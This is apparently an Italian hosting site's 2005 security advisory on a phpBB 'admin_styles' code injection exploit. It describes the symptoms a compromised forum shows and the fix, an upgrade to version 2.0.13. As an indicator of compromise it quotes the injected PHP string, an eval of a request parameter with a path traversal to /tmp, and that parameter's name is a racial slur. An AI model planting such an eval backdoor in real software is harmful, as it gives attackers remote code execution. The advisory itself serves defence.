 |
Articoli riguardanti il tema del lavoro da casa
lavorare da casa
Tutorial sul web hosting + Articoli riguardanti il tema dell' hosting di siti web
Hosting Sito Web
|
|
|
|
|
|
|
Sicurezza
Vulnerabilità phpbb:
"admin_styles" Code Injection Exploit
Data 14/03/2005
E' stato reso noto un exploit che permette di attaccare la tabella phpbb_themes utilizzata dai forum phpbb per gestire i temi.
Versioni vulnerabili : Dalla versione 2.0.12 e tutte le versioni precedenti.
Questo exploit riesce ad acquisire i diritti di amministrazione (sruttundo un "errore di programmazione")
che utilizza per modificare il tema del forum.
Cosa vede l'amministratore di un forum hackerato?
in seguito a questo attacco l'ammistratore vedrà nella sezione "gestione stili/temi" tutti i temi cancellati tranne quello di default, che
verrà impostato come tema corrente.
Sempre in questo pannello l'amministratore vedrà la seguente stringa:
Codice:
aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();
// /../../../../../../../../../../../../
../../../../../../../tmp
oltre a quella dello stile di default.
Se vedete la stringa riportata sopra nel vostro pannello è una chiara indicazione che il vostro forum è stato attaccato utilizzando
l'exploit in questione.
Soluzione : Per impedire di essere attacati da questo exploit basta aggiornare alla versione
2.0.13.
Alcuni Link utili:
Scaricare la versione 2.0.13
http://sourceforge.net/...
Altri siti che riportano la notizia:
Frsirt.com
securityfocus.com
|
|
|
|
|
|
|
|
|
